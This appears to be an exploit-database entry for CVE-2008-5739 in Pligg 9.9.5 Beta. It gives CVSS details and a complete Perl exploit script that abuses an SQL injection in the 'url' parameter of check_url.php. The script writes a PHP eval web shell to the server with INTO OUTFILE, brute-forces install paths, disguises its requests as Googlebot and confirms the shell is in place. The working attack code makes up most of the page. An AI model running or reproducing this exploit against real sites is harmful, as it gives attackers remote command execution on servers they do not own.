Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit

2008.12.30
Credit: Ams
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-5739
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl =about Pligg 9.9.5 Beta Perl exploit AUTHOR discovered & written by Ams ax330d [doggy] gmail [dot] com VULN. DESCRIPTION: Vulnerability hides in 'evb/check_url.php' unfiltered $_GET['url'] parameter. Actually, it has filtration. Filtration strips tags and converts html special chars , but it is not enough, because we can use MySQLs CHAR() function to convert shell to allowed chars. EXPLOIT WORK: Firtsly, exploit tryes to get full server path, but if not succeeded, then it will brute it. If path has been found then exploit will try to upload tiny shell via SQl-Injection. REQUIREMENTS: MySQL should be able to write to file. Know full server path to portal. magiq_quotes_gpc=off =cut use strict; use warnings; use LWP::UserAgent; use HTTP::Request::Common; Banner(); $| = 1; my $expl_url = shift or Usage(); my $serv_path = shift || ''; my $spider = LWP::UserAgent->new; $spider->timeout( 9 ); $spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'); my $def_shell = '/libs/manager.php'; my $shell = q(<?php @eval(base64_decode($_GET['cmd']));?>); my $sql_shell = join ',', map { ord } split //, $shell; my @paths = qw( /var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts /home/www /home/httpd/vhosts /usr/local/apache/htdocs /www/htdocs ); exploit( $expl_url ); sub exploit { $_ = shift; print "\n\tExploiting: $_"; my ( $packet, $rcvd, $injection ); my ( $prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?}; my $req = GET "$prot://$host$path/evb/check_url.php"; my $res = $spider->request( $req ); $serv_path = $res->content =~ /template\s+in\s+(.*?)config\.php/ ? $1 : $serv_path; if ( $serv_path ne '' ) { print "\n\tFound server path: $serv_path"; chomp( $serv_path ); $injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$def_shell'-- "; $req = GET "$prot://$host$path/evb/check_url.php?url=" . Url_Encode( $injection ); $res = $spider->request( $req ); } else { print "\n\tUnable to find path, starting bruteforce...\n"; for $serv_path ( @paths ) { printf "\tTrying: $serv_path$path$def_shell %s\r", ' ' x 10; chomp( $serv_path ); $injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$path$def_shell'-- "; $req = GET "$prot://$host$path/evb/check_url.php?url=" . Url_Encode( $injection ); $res = $spider->request( $req ); } } # Checking for shell presence $req = HEAD "http://$host$path$def_shell"; $res = $spider->request( $req ); if ( $res->status_line =~ /200/ ) { print "\n\tExploited: http://$host$path$def_shell\n\n"; } else { print "\n\tExploiting failed\n\n"; } } # Light wheel... sub Url_Encode { $_ = shift; s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg; return $_; } sub Usage { print "\n\tUsage:\t$0 http://site.com [full server path] Example: $0 http://localhost/ /var/www/htdocs $0 http://localhost/\n\n"; exit; } sub Banner { print " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Pligg 9.9.5 Beta Perl exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; }

References:

http://xforce.iss.net/xforce/xfdb/47571
http://www.securityfocus.com/bid/32970
http://www.milw0rm.com/exploits/7544


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top